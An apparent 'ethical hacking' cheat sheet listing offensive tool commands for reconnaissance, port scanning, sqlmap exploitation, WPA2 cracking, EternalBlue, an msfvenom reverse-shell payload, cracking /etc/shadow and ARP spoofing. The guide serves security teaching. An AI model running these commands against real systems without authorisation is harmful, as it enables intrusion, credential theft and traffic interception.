🔥 Ethical Hacking Command Guide

 


This guide covers essential ethical hacking commands for reconnaissance, scanning, exploitation, and more. 💻


🛠 1. Reconnaissance & OSINT (Information Gathering)

📌 WHOIS Lookup (Domain Info)

sh
whois example.com

Find domain registration details.

📌 DNS Lookup & Subdomain Enumeration

sh
nslookup example.com
dig example.com
host example.com

Find IP addresses & mail servers.

sh
sublist3r -d example.com

Find subdomains.

📌 Google Dorking (Search Engine Hacking)

sh
site:example.com filetype:pdf intitle:"index of" passwords

Search for sensitive files & exposed directories.

📌 Find Open Ports (Shodan)

sh
shodan search "apache port:80"

Search exposed devices & services.


🔎 2. Network Scanning & Enumeration

📌 Scan Open Ports (Nmap)

sh
nmap -sS -p 1-65535 example.com

Stealth scan all ports.

sh
nmap -A -T4 example.com

Aggressive scan (OS detection, version detection).

📌 Detect Live Hosts in a Network

sh
fping -g 192.168.1.0/24

List active devices.


🌐 3. Web Application Security

📌 Web Vulnerability Scanner (Nikto)

sh
nikto -h http://example.com

Scan for vulnerabilities.

📌 SQL Injection Testing (SQLmap)

sh
sqlmap -u "http://example.com/page.php?id=1" --dbs

Detect & exploit SQL injection.

📌 XSS Vulnerability Scanner

sh
xsstrike -u "http://example.com/search?q=test"

Find XSS vulnerabilities.

📌 Directory Bruteforce (Gobuster)

sh
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/common.txt

Find hidden directories & files.


📶 4. Wireless Hacking

📌 Monitor WiFi Networks (Airodump-ng)

sh
airodump-ng wlan0mon

Capture WiFi packets.

📌 Crack WiFi (Aircrack-ng)

sh
aircrack-ng -a2 -b <BSSID> -w rockyou.txt capture.cap

Crack WPA2 password using a wordlist.


💀 5. Exploitation & Payloads

📌 Metasploit Framework (Start)

sh
msfconsole

Launch Metasploit.

📌 Find Exploits

sh
search exploit apache

Find Apache exploits.

📌 Exploit Windows SMB (EternalBlue)

sh
use exploit/windows/smb/ms17_010_eternalblue

📌 Create Payload (msfvenom)

sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe

Generate a Windows reverse shell payload.


🔐 6. Password Cracking

📌 Crack Password with Hashcat

sh
hashcat -m 0 -a 0 hash.txt rockyou.txt

Run a wordlist attack against an MD5 hash (-m 0 selects MD5, -a 0 selects straight/dictionary mode).

📌 Crack Linux User Passwords

sh
john /etc/shadow --wordlist=rockyou.txt

🕵️‍♂️ 7. Man-in-the-Middle (MITM) Attacks

📌 ARP Spoofing (Bettercap)

sh
bettercap -iface eth0

Start MITM attack.

📌 Capture Traffic (Wireshark)

sh
tshark -i eth0

Monitor live traffic.


⚠️ 8. Anonymity & Privacy

📌 Browse Anonymously (Tor)

sh
tor
proxychains firefox

📌 Change MAC Address

sh
macchanger -r eth0

Randomize MAC address.
